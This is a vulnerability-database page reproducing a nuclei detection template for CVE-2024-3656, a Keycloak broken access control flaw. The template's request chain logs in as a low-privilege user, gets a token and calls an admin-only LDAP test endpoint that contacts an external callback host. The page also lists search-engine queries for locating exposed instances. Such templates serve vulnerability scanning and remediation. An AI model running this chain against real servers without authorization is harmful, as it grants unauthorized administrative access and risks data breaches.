Lucene search
K

Keycloak < 24.0.5 - Broken Access Control

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 36 Views

Keycloak < 24.0.5 - Broken Access Control, allows low-privilege users to access admin functionalities, leading to potential data breaches/system compromise

Related
Refs
Code
id: CVE-2024-3656

info:
  name: Keycloak < 24.0.5 - Broken Access Control
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.
  impact: |
    Authenticated low-privilege users can access administrative functionalities, potentially leading to data breaches or system compromise.
  remediation: |
    Update Keycloak to version 24.0.5 or later.
  reference:
    - https://cn-sec.com/archives/3262467.html
    - https://github.com/advisories/GHSA-2cww-fgmg-4jqc
    - https://access.redhat.com/errata/RHSA-2024:3575
    - https://access.redhat.com/security/cve/CVE-2024-3656
    - https://bugzilla.redhat.com/show_bug.cgi?id=2274403
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 8.1
    cve-id: CVE-2024-3656
    cwe-id: CWE-200
    epss-score: 0.02837
    epss-percentile: 0.84928
  metadata:
    verified: true
    max-request: 5
    vendor: redhat
    product: keycloak
    shodan-query:
      - http.favicon.hash:"-1105083093"
      - http.html:"keycloak"
      - http.title:"keycloak"
    fofa-query:
      - icon_hash=-1105083093
      - body="keycloak"
      - title="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2024,keycloak,auth-bypass,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"
  realm: "master"
  code_verifier: "7BhCLfrzYxLzq3XzrfiA8TplZBDciJ0RZepiiDujJKwOaMDzMZWcqGvrCfYH6s735tzxteIUH1vWLP1D2xXm88O9XFEnxcx2"
  code_challenge: "{{ trim_right(replace(replace(base64(hex_decode(sha256(code_verifier))),'/','_'),'+','-'),'=') }}"
# we can also hardcode code_challenge to wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto

http:
  - raw:
      - |
        GET /realms/{{realm}}/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2f{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge={{code_challenge}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: tabid
        part: body
        internal: true
        regex:
          - "&tab_id=(\\w+)&"
        group: 1

  - raw:
      - |
        GET /realms/{{realm}}/login-actions/authenticate?client_id=security-admin-console&tab_id={{tabid}}&client_data=eyJydCI6ImNvZGUiLCJybSI6InF1ZXJ5Iiwic3QiOiIxIn0= HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: auth_url
        part: body
        internal: true
        regex:
          - '"login.disabled = true; return true;" action="(.*?)"'
        group: 1

  - raw:
      - |
        POST {{replace(auth_url,'&amp;','&')}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&credentialId=&

    extractors:
      - type: dsl
        name: codevalue
        internal: true
        dsl:
          - replace_regex(http_3_location,".*&code=","")
  - raw:
      - |
        POST /realms/{{realm}}/protocol/openid-connect/token HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/x-www-form-urlencoded

        code={{codevalue}}&grant_type=authorization_code&client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2F{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&code_verifier={{code_verifier}}&

    extractors:
      - type: json
        part: body
        name: access_token
        json:
          - '.access_token'
        internal: true

  - raw:
      - |
        POST /admin/realms/{{realm}}/testLDAPConnection HTTP/1.1
        Host: {{Hostname}}
        authorization: Bearer {{access_token}}
        content-type: application/json

        {
            "action": "testConnection",
            "connectionUrl": "ldap://{{interactsh-url}}/",
            "bindDn": "cn=admin,dc=example,dc=com",
            "bindCredential": "password",
            "useTruststoreSpi": "ldapsOnly",
            "connectionTimeout": "5000"
        }

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'

      - type: word
        part: body
        words:
          - 'HTTP 403 Forbidden'
        negative: true
# digest: 4b0a00483046022100c1323fb8063c5d1953f87ecb32549ed575fee3eccbf29eab7f4081dc7b2f7b59022100b71d266a9028ff82ae99cc55f527d19963013ff60d344ee51937decb32001a3d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.18.1
EPSS0.02837
SSVC
36